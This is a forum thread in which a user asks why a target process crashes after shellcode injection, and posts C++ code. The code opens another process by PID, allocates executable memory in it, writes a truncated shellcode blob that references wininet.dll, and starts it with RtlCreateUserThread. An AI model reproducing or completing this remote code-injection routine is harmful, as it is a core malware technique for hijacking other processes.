Results 1 to 7 of 7

Thread: RtlCreateUserThread best practices

Threaded View

  1. #1

    Question RtlCreateUserThread best practices

    Hi guys
    I have a shell code, used VirtualAlloc with MEM_COMMIT and PAGE_EXECUTE_READWRITE, then RtlCreateUserThread
    the code is executed successfully but then the process crash with C000005 excption

    I read aboud DEP, but I already used PAGE_EXECUTE_READWRITE !
    I also tried calling ExitThread
    How to avoid crashing the process ?
    Thanks
    Here is the code
    Code:
    RtlCreateUserThread=(_RtlCreateUserThread)GetProcAddress(ntdll,"RtlCreateUserThread");
        cin >>pid;
     
        HANDLE hProc=OpenProcess(PROCESS_ALL_ACCESS,false,pid);
    
    	HANDLE code=VirtualAllocEx(hProc, NULL, 508 ,MEM_COMMIT , PAGE_EXECUTE_READWRITE);
    	void * hex =	"\xe9\xff\x00\x00\x00\xe8\x1b\x01"
    "\x00\x00\x77\x69\x6e\x69\x6e\x65"
    "\x74\x2e\x64\x6c\x6c\x00\xe8\x1f"....
    DWORD sizeofHex = 509;
    	WriteProcessMemory(hProc,code,hex,sizeofHex,NULL);
    	__try {
    		RtlCreateUserThread(hProc,NULL,false,0,0,0, code,0,&hThd,&cid);
    	}
    	__except (GetExceptionCode() ){
    		return -1;
    	}
        WaitForSingleObject(hThd,INFINITE);
     
        CloseHandle(hThd);
        CloseHandle(hProc);
    Last edited by capadleman; June 18th, 2013 at 12:59. Reason: added the source code
    I promise that I have read the FAQ and tried to use the Search to answer my question.

Similar Threads

  1. Replies: 11
    Last Post: September 7th, 2009, 15:26
  2. ntdll.RtlCreateUserThread problem
    By vadimpo in forum OllyDbg Support Forums
    Replies: 4
    Last Post: September 5th, 2009, 22:29
  3. Cant attach blocked by RtlCreateUserThread
    By Refund in forum OllyDbg Support Forums
    Replies: 1
    Last Post: January 17th, 2009, 15:50

Tags for this Thread

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •